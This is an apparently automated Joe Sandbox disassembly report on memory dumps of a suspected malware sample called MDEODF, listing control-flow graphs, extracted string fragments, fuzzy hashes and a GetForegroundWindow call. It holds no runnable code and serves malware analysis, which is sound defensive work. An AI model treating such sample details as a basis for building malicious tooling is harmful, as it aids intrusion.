                                    • String ID: (p$D@'$D@'
                                    • API String ID: 0-2399180897
                                    • Opcode ID: 3cb517a18da229b1e7d5c65e3424b5ddf7a19a8752da9aa53d0062e0177766bc
                                    • Instruction ID: bd7894473519f66ea5ef3c61c0d0fff68ab4fa3827683ab3276b4a6b39ef84ac
                                    • Opcode Fuzzy Hash: 3cb517a18da229b1e7d5c65e3424b5ddf7a19a8752da9aa53d0062e0177766bc
                                    • Instruction Fuzzy Hash: 57D1C174A01259CFCB15CFA8C984A9DBBF2FF49310F1585A5E409AB36AD770AD89CF40

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 394 30120b-301220 396 301222 394->396 397 301229-30122a 394->397 398 301232-301477 396->398 399 301238-3015d4 396->399 400 30122c-30122d 396->400 397->400 401 30123e-30123f 397->401 408 30147a-301500 398->408 406 3015d7-301644 399->406 402 301324-30134d 400->402 405 301249-301259 401->405 407 301350-301394 402->407 409 301264-3012cd 405->409 415 301646-301647 406->415 416 30164c-301662 406->416 428 30139b-3013ab 407->428 441 301508-301513 call 3056c0 408->441 409->407 438 3012d3-30131f 409->438 421 3017a4-3017be 415->421 419 301664-301670 416->419 420 30168c 416->420 423 301672-301678 419->423 424 30167a-301680 419->424 427 301692-3016e6 420->427 429 30168a 423->429 424->429 447 301769-3017a2 427->447 448 3016ec-301738 427->448 463 3013b1 call 302c25 428->463 464 3013b1 call 302c98 428->464 429->427 433 3013b7-3013f7 433->408 443 3013fd-301449 433->443 438->402 450 301830-301837 438->450 445 301519-301554 441->445 443->450 445->406 457 30155a-3015a6 445->457 447->421 448->450 457->450 463->433 464->433
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (e'$@T'$@T'
                                    • API String ID: 0-2136524690
                                    • Opcode ID: d3bafc9a57412e5536efea01acc255000f29efedee7dc69233de2c0775846757
                                    • Instruction ID: 4403e65ba4441ac05729bb8ebad4bc988a1a3f7bac4fd7dece6c54d675b7ec91
                                    • Opcode Fuzzy Hash: d3bafc9a57412e5536efea01acc255000f29efedee7dc69233de2c0775846757
                                    • Instruction Fuzzy Hash: 97A1A2B4A00229CFCB25CF98D884BDDB7B5FF49304F5085A6D419AB265E730AE85CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 465 306f20-306f35 466 306f61-306f86 465->466 467 306f37-306f39 465->467 469 306f8d-306fec 466->469 468 306f3b-306f43 467->468 467->469 471 306f45 468->471 472 306f4f-306f52 468->472 480 306ff8-307027 469->480 481 306fee 469->481 471->472 474 306f5a-306f5e 472->474 481->480
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (p$(p$M>
                                    • API String ID: 0-3726686641
                                    • Opcode ID: 0e762851bc852e08bd29ca350343c819ed63230b2e218f057bd338dab4d2a5b9
                                    • Instruction ID: 05946ec19030b7cc319b0036f46aa7bd551b5e3aef295cfbbc6205d156cea1cb
                                    • Opcode Fuzzy Hash: 0e762851bc852e08bd29ca350343c819ed63230b2e218f057bd338dab4d2a5b9
                                    • Instruction Fuzzy Hash: 5C3106317043505FC316DB2DE824A1EBFEADFC9360319856AE809CB39ADE34DC068795

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 739 302c25-302c63 743 302cc4-302d68 739->743 744 302c66-302c83 739->744 755 302d70-302d8f 743->755 744->743
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |}'$|}'
                                    • API String ID: 0-1071223719
                                    • Opcode ID: d1d7279e9351b2c6f58557e21d2ae18fc44bc68057a6336460a023599c70a55d
                                    • Instruction ID: 502bd2fd52860fea4fc23dda0c407d05e03cbe9b9b4410243ec7cde3afbee1bd
                                    • Opcode Fuzzy Hash: d1d7279e9351b2c6f58557e21d2ae18fc44bc68057a6336460a023599c70a55d
                                    • Instruction Fuzzy Hash: 6D415E70E0938A9FCB02DF68D8509DDBFB1EF49310B5582D2D454AB267D730D90ACB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 757 306de8-306e0d 758 306e14-306e37 757->758 759 306e0f 757->759 760 306e39-306e4b 758->760 761 306e4e-306e9d 758->761 759->758 760->761 767 306eda-306ee2 761->767 768 306e9f-306ed7 761->768 775 306ee5 call 306f20 767->775 776 306ee5 call 306f10 767->776 768->767 770 306eeb-306f0c 775->770 776->770
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @O&$s
                                    • API String ID: 0-1050815684
                                    • Opcode ID: c3720c1aa700482133470677c6adef2d3f2da9e0ce09f092b48ab05b4b160b66
                                    • Instruction ID: 818b423abf20f3ea53e226f647999fc6d881e1c5dc2cca98e8cb5707bfe3a595
                                    • Opcode Fuzzy Hash: c3720c1aa700482133470677c6adef2d3f2da9e0ce09f092b48ab05b4b160b66
                                    • Instruction Fuzzy Hash: AA41D274E012099FCB09DFA9E455AEEBBF1BF88310F108429E415B7354DB345A85CFA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 777 302c98-302cbd 778 302cc4-302d68 777->778 779 302cbf 777->779 789 302d70-302d8f 778->789 779->778
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |}'$|}'
                                    • API String ID: 0-1071223719
                                    • Opcode ID: 593c856d1299e9eefd5c2c3fe2d0e4a89197430361fe91277b63ad510be96c0b
                                    • Instruction ID: 4c94e150ad031f4a3f8cff5172f82ba2fc50af222065ea40257f6e50285c91f8
                                    • Opcode Fuzzy Hash: 593c856d1299e9eefd5c2c3fe2d0e4a89197430361fe91277b63ad510be96c0b
                                    • Instruction Fuzzy Hash: 3831E774E0025E9FCB05DFA8D5809DEBBB1FF49310B5086A6D858AB355D730EA46CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 791 30e0cd-30e0f5 792 30e0f7 791->792 793 30e0fc-30e192 791->793 792->793 802 30e19a-30e1b9 793->802
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |}'$|}'
                                    • API String ID: 0-1071223719
                                    • Opcode ID: b7e7d327cb088c08c6d3da136cf678f3a86e352b9a938757e43f255d1b9e65d2
                                    • Instruction ID: 300e701a24bfee8ee0a706d5c7d7e7c7e820d467c0d3508d694917e20a21a33a
                                    • Opcode Fuzzy Hash: b7e7d327cb088c08c6d3da136cf678f3a86e352b9a938757e43f255d1b9e65d2
                                    • Instruction Fuzzy Hash: 06312DB4A0025E9FCB05DFA8D8809EEBBB1FF48310B408666D8557B765D730AD4ACF94

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 804 304328-30435d 805 304364-30440a 804->805 806 30435f 804->806 806->805
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: hp$hp
                                    • API String ID: 0-2017355707
                                    • Opcode ID: 40213ddc0354abd133ee0eb24479444f48a26471ab2b2300e2badc00facabd6d
                                    • Instruction ID: a3edb2938d24f0523d3be0f186bd289de63c609d5c9cf6c4e29e1649188aa005
                                    • Opcode Fuzzy Hash: 40213ddc0354abd133ee0eb24479444f48a26471ab2b2300e2badc00facabd6d
                                    • Instruction Fuzzy Hash: 103150B0E0029A8FCB05DFA8D9509EEBFF1FF89300B44469AD455BB392C730A905CB51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: hp$hp
                                    • API String ID: 0-2017355707
                                    • Opcode ID: 7d65eebbc48d1e482337be34ff95761a5e1dad95d2dbdf996a9e2008531c9ffa
                                    • Instruction ID: 1f6fa1ad4f832cc962398ff0ae5e322688e07c41271207926f583fa777ca55d3
                                    • Opcode Fuzzy Hash: 7d65eebbc48d1e482337be34ff95761a5e1dad95d2dbdf996a9e2008531c9ffa
                                    • Instruction Fuzzy Hash: EA215974E0024A9FCB05DFA8D540ADDBBB1EF88310F5482A6D4157B291DB30AA46CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: hp$hp
                                    • API String ID: 0-2017355707
                                    • Opcode ID: c1f94ff6f30a094abb4dbbd7d81b85547acc3c7678c989c19b69daf101dd34f7
                                    • Instruction ID: 7b822783b1687be18ee626f138a0b6752965ac55c6938db01cf46e386fa4d7cc
                                    • Opcode Fuzzy Hash: c1f94ff6f30a094abb4dbbd7d81b85547acc3c7678c989c19b69daf101dd34f7
                                    • Instruction Fuzzy Hash: EF213D70E0024E9FCB09DFA8D444ADEBBB1EF88300F5081A6D95477395DB30E946CBA1
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0048023F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636962150.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_480000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ForegroundWindow
                                    • String ID:
                                    • API String ID: 2020703349-0
                                    • Opcode ID: b5e7f3c8bd1779f42299db093b189e1350ec2508bb8055173051527c134d7580
                                    • Instruction ID: ec45e0c0090bb3eafe7e45f6a957ac4beeefdfc3b90c9187002fc50b42160535
                                    • Opcode Fuzzy Hash: b5e7f3c8bd1779f42299db093b189e1350ec2508bb8055173051527c134d7580
                                    • Instruction Fuzzy Hash: 8721B0B4D012089FCB50CFA9D588ADEFBF0AF49320F24946AE814B7350D374A949CFA5
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0048023F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636962150.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_480000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ForegroundWindow
                                    • String ID:
                                    • API String ID: 2020703349-0
                                    • Opcode ID: 99e66b9678c4edacaabc638188392cba36f5b08985efc4ce546239592f1347e6
                                    • Instruction ID: 934d4db8acf74810c6ab1476cd72d01e13b95b5d8e8a42e82d72a2e20c3914bd
                                    • Opcode Fuzzy Hash: 99e66b9678c4edacaabc638188392cba36f5b08985efc4ce546239592f1347e6
                                    • Instruction Fuzzy Hash: 26219CB4D012089FCB50CFA9D588ADEFBF4AF49324F24946AE818B7350D374A949CF65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (p
                                    • API String ID: 0-4175582459
                                    • Opcode ID: 1c4e1bd068cb80a11f22e787608f34cf6a2fbbd8045ee62c439666d442742130
                                    • Instruction ID: e52f83c5823e6dbd53ffd70b7dfdc995f9cee3636e6a349995dd69332776d89e
                                    • Opcode Fuzzy Hash: 1c4e1bd068cb80a11f22e787608f34cf6a2fbbd8045ee62c439666d442742130
                                    • Instruction Fuzzy Hash: A6912774A01208CFDB19DFB8C594A9DBBB2FF89304F208569D409AB3A5DB35AD46CF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ~'
                                    • API String ID: 0-4035409295
                                    • Opcode ID: d4f41235cb3389f6163efddf643cb6aff930b41ac658753d13d7a890f1b1815f
                                    • Instruction ID: fa0341c5ab812c4e1b67b3421d48af7317e64fde4c41836c0efc2446d9710efb
                                    • Opcode Fuzzy Hash: d4f41235cb3389f6163efddf643cb6aff930b41ac658753d13d7a890f1b1815f
                                    • Instruction Fuzzy Hash: 6C61B374E01218CFCB05CFA9D894AEDBBB5FF89310F149169E809AB3A5D770AD46CB50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ~'
                                    • API String ID: 0-4035409295
                                    • Opcode ID: ec1389511f9e8f793058f5d29f21b35adf7e94d36aaee5e5b029d1fd38ea2beb
                                    • Instruction ID: 2aa69824a64c3451622f7c4ae8f9ccbbef94d84532b6b41de0603ede7ab6a2ae
                                    • Opcode Fuzzy Hash: ec1389511f9e8f793058f5d29f21b35adf7e94d36aaee5e5b029d1fd38ea2beb
                                    • Instruction Fuzzy Hash: 9A512574D01258DFCB06CFA8D898ADDBBB1FF49310F148569E409AB3A5D770AD86CB50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRp
                                    • API String ID: 0-3405495957
                                    • Opcode ID: d7fb9839e05aefa74d5584cd54336e663365e75dca86e812e64951cb7cd72af6
                                    • Instruction ID: 3256aebf630d8bafdde9df21bdf2a4f6ee38655622a91bd85d77ab15e8749597
                                    • Opcode Fuzzy Hash: d7fb9839e05aefa74d5584cd54336e663365e75dca86e812e64951cb7cd72af6
                                    • Instruction Fuzzy Hash: 6B419EB4E01219DFCB08DFA9D4909EEBBB2FF89300F24856AD415AB354DB35A945CF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: pR'
                                    • API String ID: 0-2251766783
                                    • Opcode ID: 4ea8efaec5029764375e824f0c0e7c968ec8c903775e1408a84800a2c3aa2fd7
                                    • Instruction ID: e44d9eeb7cb0da447f8be28913159aed593f3c8b37a573eb6b086f69359ea05e
                                    • Opcode Fuzzy Hash: 4ea8efaec5029764375e824f0c0e7c968ec8c903775e1408a84800a2c3aa2fd7
                                    • Instruction Fuzzy Hash: 5F214C70E0125A9FCF05DBA8D450ADDBFB1AF49300F4582A6D454BB262D770A94ACF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dP'
                                    • API String ID: 0-2939048657
                                    • Opcode ID: d0530daa7cfcdefe7c0b729f73335183de2b989546d4a91339803666dbd631a8
                                    • Instruction ID: 3e56f8520b78cb6550a75dcd1a1431c3aee60cd4ef260696083abec9827e1604
                                    • Opcode Fuzzy Hash: d0530daa7cfcdefe7c0b729f73335183de2b989546d4a91339803666dbd631a8
                                    • Instruction Fuzzy Hash: 37113D74910309EFCB06FF68E449B8DBBB1EF49304F408D64D0189B269DB749A8A8F95
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: M>
                                    • API String ID: 0-1619507327
                                    • Opcode ID: 35cc772f30ff8c0cc034dc6a438a8424edd0d92b80663d616823079101eed4a6
                                    • Instruction ID: 58d44c3b360a062d8dc297295091c443b6e2f5fad8ff35a535a9379087224f8e
                                    • Opcode Fuzzy Hash: 35cc772f30ff8c0cc034dc6a438a8424edd0d92b80663d616823079101eed4a6
                                    • Instruction Fuzzy Hash: F3F02E3270A2405FC317CB5AD86495ABFA9CEC576030980ABF80CCB395DA30DC02C750
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1e1a40edc692a99874109005c5229c2d4b73a6e50210317ce5470f8a31a1ca7
                                    • Instruction ID: 2a84d351ebab63e7d44085c15f9ce3c6064de229889063e4739615854708c76f
                                    • Opcode Fuzzy Hash: b1e1a40edc692a99874109005c5229c2d4b73a6e50210317ce5470f8a31a1ca7
                                    • Instruction Fuzzy Hash: 5B41B0B19093C99FCB13DF68D860ADD7F70AF46310B4942E7D480EB1A3D634990ACB62
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 275cb65edb9b7256f5fa874b19f8fd0ae72886baebadb1a7471fa7d7c9584269
                                    • Instruction ID: 50cbc60f8696307ca93c2600c2eb98417f9beaf8fda306c98a9797ac877e6db7
                                    • Opcode Fuzzy Hash: 275cb65edb9b7256f5fa874b19f8fd0ae72886baebadb1a7471fa7d7c9584269
                                    • Instruction Fuzzy Hash: DD020374D11219CFDF21CFA8C895BEEBBB1BB49300F1092AAD409A7290DB749E85CF55
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6b397ac9aaa55b5b660dc16d4e6295fc8b5f02dd7a465f4c0ec04947347b2843
                                    • Instruction ID: 0f1efbc097b5a9436d3784bd105a0f26145f853086936b36eea873bf546a453c
                                    • Opcode Fuzzy Hash: 6b397ac9aaa55b5b660dc16d4e6295fc8b5f02dd7a465f4c0ec04947347b2843
                                    • Instruction Fuzzy Hash: 95F1F274D01219CFDF25CFA8C895B9EBBF2BB49300F1085AAD409A7290EB749E85CF55
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e2f3555d80d141c5345d65a5f0890424b0b521a177c03e3d10a669eb4212a5ff
                                    • Instruction ID: 6eaf74a5f5f90d580bfb1466b016487b042a92bf206a38e561b36289fcb852cf
                                    • Opcode Fuzzy Hash: e2f3555d80d141c5345d65a5f0890424b0b521a177c03e3d10a669eb4212a5ff
                                    • Instruction Fuzzy Hash: 22E1AE74A01718CFCB05CFA9C898AEDBBF6BF4A310F148669E409AB365D770A945CF50
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d55abb6f5d17472ccc83c34cfdf7e5f083fb91a4170758d4f2c1ee311f254e5
                                    • Instruction ID: a2bc7d2d44592764c658816d4987efabcda9620893eacf8fbfe55a62507bcde9
                                    • Opcode Fuzzy Hash: 7d55abb6f5d17472ccc83c34cfdf7e5f083fb91a4170758d4f2c1ee311f254e5
                                    • Instruction Fuzzy Hash: 024190719093D99FCB03DB68D8606DD7FB0AF47310B4982E7D490EB1A3D634A90ACB65
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b4ef91122618aeeccc019d14c584c777efa0c28d3f8d260cd7a7ee92cd4b5fbb
                                    • Instruction ID: 689fd9d2059d300da7d9276f0ded2c8c178b2a53b923299c682292844c950157
                                    • Opcode Fuzzy Hash: b4ef91122618aeeccc019d14c584c777efa0c28d3f8d260cd7a7ee92cd4b5fbb
                                    • Instruction Fuzzy Hash: A9E1A274E01218CFDB55CFA9C484A9DFBF5BF48310F1586A6E818AB366D734A986CF40
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b12f1203fe9975738cc8027a0e5a41c8fe97b0c7726f3f39181d6d275f662a45
                                    • Instruction ID: 95b34f0b439f3976b3922ae7999e66ec96afd3fa50a1ac527c73ac9ffdab1280
                                    • Opcode Fuzzy Hash: b12f1203fe9975738cc8027a0e5a41c8fe97b0c7726f3f39181d6d275f662a45
                                    • Instruction Fuzzy Hash: 33D1C174E01219CFCB25CFAAC594ADDBBF5BF49300F208269D409AB7A6D730AA45CF50
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aef89e82dedaf41325f739eb51fc71bd45801e23e556e2d4e94cf8d428efe0c0
                                    • Instruction ID: b70dba2510d94d6af7efe7efe71841f23c4ac02c41fe9e4fc1f453df579f1a52
                                    • Opcode Fuzzy Hash: aef89e82dedaf41325f739eb51fc71bd45801e23e556e2d4e94cf8d428efe0c0
                                    • Instruction Fuzzy Hash: 3F318170D042999FCB06DFA8D850ADDBFB1FF49300F4482E6D454BB2A2D730A94ACB95
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8d8c5f7674bab42dc59bac5c7df88b51367f9866fd2e79b3692b3c9edde4d7d5
                                    • Instruction ID: 4c6ab4ed7b7d1a1196f81a8d2534a499149a934d7664f30fcd0763e0719b9c1c
                                    • Opcode Fuzzy Hash: 8d8c5f7674bab42dc59bac5c7df88b51367f9866fd2e79b3692b3c9edde4d7d5
                                    • Instruction Fuzzy Hash: 93A1D474E05209CFDB25CFA9C494ADDBBF1BF89310F6186A9D405AB3A2D730A985CF50
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c0ab4da5486bbc81fdbc35103c45fefb835da51d5e548d72371440d338f717f
                                    • Instruction ID: 11598ddc47b3a5d464087e0c3fc49172129aa01e773ed28fb4618e667cd3544d
                                    • Opcode Fuzzy Hash: 4c0ab4da5486bbc81fdbc35103c45fefb835da51d5e548d72371440d338f717f
                                    • Instruction Fuzzy Hash: 9391F774A01208CFDB19DFA8C594A9EBBB2FF89304F204569D409AB395DB35ED42CF54
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 549fc19c4023ff1853395add4a6ae270c8eab6099e054798d9ff44c96878a138
                                    • Instruction ID: a8705d8bd4199c6f214d84e85b3c5bd168a7d45566232b0fa506644e0362f381
                                    • Opcode Fuzzy Hash: 549fc19c4023ff1853395add4a6ae270c8eab6099e054798d9ff44c96878a138
                                    • Instruction Fuzzy Hash: B0511474D02308CFDB19DFB9D894AADBBF2AF8A304F208429D405AB394DB359942CF14
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2105552843e7a4d196366fc98b18bbe4174f4ddc45160b4cb1b5c32cc031c653
                                    • Instruction ID: 77c41c044cb56a23d376c2655a661d5ed52cacccdb26b8a68c19783d550dea50
                                    • Opcode Fuzzy Hash: 2105552843e7a4d196366fc98b18bbe4174f4ddc45160b4cb1b5c32cc031c653
                                    • Instruction Fuzzy Hash: 9851C074E01208DFDB09CFA9D484AEDBBF2BF89310F548669E405AB3A5D770A985CF50
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cc96c7110484d5a7474c269d2ec19cad98b43e9b2911e14f2f701b592fb95d1b
                                    • Instruction ID: fe26765a36243d970c3898f09f263a4ca60abae8f36c7711cc4ed28f94434541
                                    • Opcode Fuzzy Hash: cc96c7110484d5a7474c269d2ec19cad98b43e9b2911e14f2f701b592fb95d1b
                                    • Instruction Fuzzy Hash: AB51ABB4D012489FDF21CFA9D984A9EFFB1BF09304F60906AE808BB255D7349985CF54
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4cecc978c44610d6dcd8e2a39f0156e6e467abed6be8b39e57085e3b6a113160
                                    • Instruction ID: e9be7ed608489cf2c91dfe9732fbc387f65af39f33447d6f7db7cf03cad4fcce
                                    • Opcode Fuzzy Hash: 4cecc978c44610d6dcd8e2a39f0156e6e467abed6be8b39e57085e3b6a113160
                                    • Instruction Fuzzy Hash: 9B51F574D01208CFDB19DFA9D494AEDBBB2FF89301F249429E405AB3A4DB349942CF14
                                    Memory Dump Source
